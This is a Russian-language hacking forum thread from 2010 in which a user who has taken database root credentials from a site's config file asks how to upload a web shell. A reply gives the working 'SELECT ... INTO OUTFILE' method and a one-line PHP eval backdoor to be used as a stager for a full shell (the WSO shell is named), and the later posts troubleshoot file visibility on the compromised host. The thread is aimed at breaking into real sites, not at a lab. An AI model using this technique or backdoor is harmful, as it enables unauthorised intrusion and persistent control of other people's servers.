Старый 02.08.2010, 13:55   #1
Godfather Bulan
 
Аватар для Godfather Bulan
 
Регистрация: 06.07.2010
Сообщений: 4
Репутация: 1
По умолчанию Как залить шелл через бд?

Собственно как залить шелл через БД, имея рут доступ к БД? Гугл как-то херова помог. Не хочет создавать файл нигде. даже где 777 права на папку
Godfather Bulan вне форума   Ответить с цитированием
Старый 02.08.2010, 14:15   #2
mr.The
 
Аватар для mr.The
 
Регистрация: 05.07.2010
Сообщений: 73
Репутация: 16
По умолчанию

https://rdot.org/forum/showthread.php?t=352 вот как-то так, я думаю.
__________________
Бложек mr.The. :rolleyes:
mr.The вне форума   Ответить с цитированием
Старый 02.08.2010, 14:22   #3
Godfather Bulan
 
Аватар для Godfather Bulan
 
Регистрация: 06.07.2010
Сообщений: 4
Репутация: 1
По умолчанию

Скулей я там не нашел, залил шелл. Там права вроде везде есть, но как-то криво есть они. Нашел в одном конфиге рут на БД и законнектился
p.s. wso
Godfather Bulan вне форума   Ответить с цитированием
Старый 02.08.2010, 15:23   #4
nobody
 
Аватар для nobody
 
Регистрация: 05.07.2010
Сообщений: 176
Репутация: 130
По умолчанию

=\ плохо гуглил
Код:
SELECT 'what?!' INTO OUTFILE 'full_path';
вместо what?! - шелл
вместо full_path - полный путь к директории с правом на запись

Владельцем файла (логично) будет юзверь с под которого запущен мускул. Советую залить ченить простенькое
типа
PHP код:
<?php $e=get_magic_quotes_gpc()?stripslashes($_POST[e]):$_POST[e];if(!empty($e))eval($e);?>
а дальше через это нормальный шелл

Тема обсосана со всех сторон уже тысячи раз
nobody вне форума   Ответить с цитированием
Старый 02.08.2010, 20:28   #5
Godfather Bulan
 
Аватар для Godfather Bulan
 
Регистрация: 06.07.2010
Сообщений: 4
Репутация: 1
По умолчанию

Цитата:
Сообщение от nobody Посмотреть сообщение
=\ плохо гуглил
Код:
SELECT 'what?!' INTO OUTFILE 'full_path';
вместо what?! - шелл
вместо full_path - полный путь к директории с правом на запись

Владельцем файла (логично) будет юзверь с под которого запущен мускул. Советую залить ченить простенькое
типа
PHP код:
<?php $e=get_magic_quotes_gpc()?stripslashes($_POST[e]):$_POST[e];if(!empty($e))eval($e);?>
а дальше через это нормальный шелл

Тема обсосана со всех сторон уже тысячи раз
Это пробовал, выдает "еррор 2"
Godfather Bulan вне форума   Ответить с цитированием
Старый 02.08.2010, 20:46   #6
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Цитата:
Сообщение от Godfather Bulan Посмотреть сообщение
Это пробовал, выдает "еррор 2"
еррор 2 это:
No such file or directory

--------------------------
Опиши нормально проблему, из постов непонятно что у тебя имеется.
У тебя удалённое подключение рутовое что-ли, или что?
Если так, то как ты понял что права на папки 777?
А если у тебя шелл на хосте, то что ты собираешься ещё залить?

нипанятна =\
Jokester вне форума   Ответить с цитированием
Старый 02.08.2010, 21:03   #7
Godfather Bulan
 
Аватар для Godfather Bulan
 
Регистрация: 06.07.2010
Сообщений: 4
Репутация: 1
По умолчанию

Цитата:
Сообщение от Jokester Посмотреть сообщение
еррор 2 это:
No such file or directory

--------------------------
Опиши нормально проблему, из постов непонятно что у тебя имеется.
У тебя удалённое подключение рутовое что-ли, или что?
Если так, то как ты понял что права на папки 777?
А если у тебя шелл на хосте, то что ты собираешься ещё залить?

нипанятна =\
Ок, описываю подробно. Залил шелл, захожу в директорию с сайтом, удаляю любой файл - на него заходит, но нету в списке у шелла.
Но при этом все файлы идентичны, то есть если в папке /images/ есть фал porshe.jpg, то и на сайте он тоже есть


по началу думал кешируются - залил в папку еще один шелл - тоже из онлайна не видно =(

ПРова на шелле висят
www/www
а на файлах рядом
_apache/_apache
Godfather Bulan вне форума   Ответить с цитированием
Старый 24.12.2010, 14:52   #8
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

Мб у тебя шелл на зеркале, раз новые файлы не видно, и старые удаляться только из шела. А сам шелл ты грузишь из нужного домена или из соседей?
b3 вне форума   Ответить с цитированием
Старый 24.12.2010, 17:17   #9
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

ничо так копнул ты..4 месяца,думаю шелл уже б залился сам за такое время)
snake вне форума   Ответить с цитированием
Старый 24.12.2010, 17:57   #10
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

Сори на дату не глянул, тред был помечен как непрочитанное =)))
b3 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot